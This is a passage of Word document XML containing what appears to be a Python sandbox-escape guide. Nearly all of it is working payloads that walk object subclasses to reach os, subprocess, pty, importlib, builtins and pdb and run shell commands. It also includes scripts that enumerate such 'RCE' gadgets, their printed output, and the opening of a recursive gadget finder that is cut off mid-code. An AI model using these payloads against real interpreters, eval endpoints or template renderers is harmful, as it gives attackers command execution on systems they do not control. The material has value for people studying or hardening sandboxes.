    </w:p>
    <w:p w14:paraId="587E55DF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There are a lot, and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we just need one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to execute commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B12960" w14:textId="190F1842" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D07CB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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3170A7E7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We can do the same thing with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other libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that we know can be used to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execute commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E61962" w14:textId="0585AFDF" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B689258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#os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2EB93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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D42351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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" == x.__init__.__globals__["__name__"] ][0]["system"]("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725BCE1D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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF19C2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438BFE9E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#subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3D6C0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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "subprocess" == x.__init__.__globals__["__name__"] ][0]["Popen"]("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A427E68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[ x for x in ''.__class__.__base__.__subclasses__() if "'subprocess." in str(x) ][0]['Popen']('ls')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F842F4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[ x for x in ''.__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0]('ls')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162D8F6B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6CE3AA40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#builtins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750743CC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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "__bultins__" in x.__init__.__globals__ ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0CE57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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"].__import__("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B8A25E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2B39C3EB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#sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621DEB0E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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CF6C60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lastRenderedPageBreak/>
        <w:t>[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"].system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D751F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0802DC5D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#commands (not very common)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CC94CE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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "commands" in x.__init__.__globals__ ][0]["commands"].getoutput("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73758570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7E8D1B63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#pty (not very common)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06608EFE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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pty" in x.__init__.__globals__ ][0]["pty"].spawn("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A5AA6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42546ADF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#importlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B94BB50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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].import_module("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E2BEC8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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].__import__("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBDECE0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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].import_module("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D352EA1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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].__import__("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4ACDD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3CC7E53C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#pdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB1FBBF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[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pdb" in x.__init__.__globals__ ][0]["pdb"].os.system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613BD21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Moreover, we could even search which modules are loading malicious libraries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4B86A9" w14:textId="69A97AAB" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4279DBE8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bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F63D4E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for b in bad_libraries_names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9AB400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vuln_libs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and b in x.__init__.__globals__ ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F83598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print(f"{b}: {', '.join(vuln_libs)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D0101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2F8C55B6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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0F27F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lastRenderedPageBreak/>
        <w:t>os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4623C1A3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commands: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C85956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subprocess: BaseDependency, Origin, Version, Package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75183140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pty: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C264B80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importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242B5308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imp: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D121B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sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4C5220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builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF777EE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pdb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C0CB4A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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5443A9F4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Moreover, if you think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other libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> may be able to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invoke functions to execute commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can also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filter by functions names</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the possible libraries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBC7D6" w14:textId="4F6027AF" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E408D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bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F129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bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54896C52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for b in bad_libraries_names + bad_func_names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370D5F7B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vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1714B56C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print(f"{b}: {', '.join(vuln_funcs)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1080AB82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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33404157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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43177967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os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7699333D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commands: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4FAEA8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subprocess: BaseDependency, Origin, Version, Package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EC5AD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pty: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6365D507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importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA4F1A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imp: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A975F5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lastRenderedPageBreak/>
        <w:t>sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F05DB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builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053071D6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pip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8BD8F6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pdb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460F3460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system: _wrap_close, _wrap_close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50592D00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getstatusoutput: CompletedProcess, Popen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082048F2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getoutput: CompletedProcess, Popen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B2DA0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call: CompletedProcess, Popen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132386E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Popen: CompletedProcess, Popen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAB9D9D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spawn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA7F14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import_module: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7A039A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__import__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E8DC8D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load_source: NullImporter, _HackedGetData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A61CA24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execfile: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04949468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execute: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E1EA4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__builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPRequest, _Poly1305Context, PSS, OAEP, MGF1, _RSASignatureContext, _RSAVerificationContext, _RSAPrivateKey, _RSAPublicKey, _X25519PublicKey, _X25519PrivateKey, _X448PublicKey, _X448PrivateKey, Scrypt, PKCS7SignatureBuilder, Backend, GetCipherByName, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, RawJSON, JSONDecoder, JSONEncoder, Cookie, CookieJar, MockRequest, MockResponse, Response, BaseAdapter, UnixHTTPConnection, monkeypatch, JSONDecoder, JSONEncoder, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA50A5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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B4A655" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Recursive Search of Builtins, Globals...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725DBCEE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This is just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awesome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. If you are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looking for an object like globals, builtins, open or anything</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> just use this script to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recursively find places where you can find that object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125DD31" w14:textId="3094D5B6" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A3557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import os, sys # Import these to find more gadgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3912F765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27A9C206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SEARCH_FOR = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36851BF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# Misc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8EF75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"__globals__": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3EDA5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"builtins": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB0A463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"__builtins__": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169F54D1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"open": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79858A26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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1311C4CD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# RCE libs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB79CA7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"os": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0184A4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"subprocess": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4A567A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"commands": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE46A6D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"pty": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED3A4D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"importlib": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867FD16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"imp": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865102E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"sys": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182A90BA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"pip": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FEE525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"pdb": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A9916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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083C423D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# RCE methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC5D084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"system": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD0DD3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"popen": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7868487E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"getstatusoutput": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B1F8BE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"getoutput": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA06B4F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"call": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41B12E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"Popen": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793718BC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"popen": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BCDB22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"spawn": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552F847D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"import_module": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA80C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"__import__": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172B5C8A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"load_source": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7589D27A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"execfile": set(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C82F0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"execute": set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F180B53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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68775CB2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462C07EF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#More than 4 is very time consuming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22392B8D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MAX_CONT = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06487DE4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26125A1D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#The ALREADY_CHECKED makes the script run much faster, but some solutions won't be found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2917CC8C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#ALREADY_CHECKED = set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110EF1AD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055A3306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def check_recursive(element, cont, name, orig_n, orig_i, execute):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706410FE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# If bigger than maximum, stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ECD9BB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if cont &gt; MAX_CONT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E69C5B5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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD2845F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D25A0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# If already checked, stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3409414B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#if name and name in ALREADY_CHECKED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621AAFBD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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    #    return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D4C92A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6236327D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# Add to already checked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543BC445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#if name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E56343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#    ALREADY_CHECKED.add(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621DACCC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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277AF570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# If found add to the dict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33268FAC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for k in SEARCH_FOR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696285FC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if k in dir(element) or (type(element) is dict and k in element):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BAFFD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   SEARCH_FOR[k].add(f"{orig_i}: {orig_n}.{name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F5DF81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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8C3020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# Continue with the recursivity</w:t>
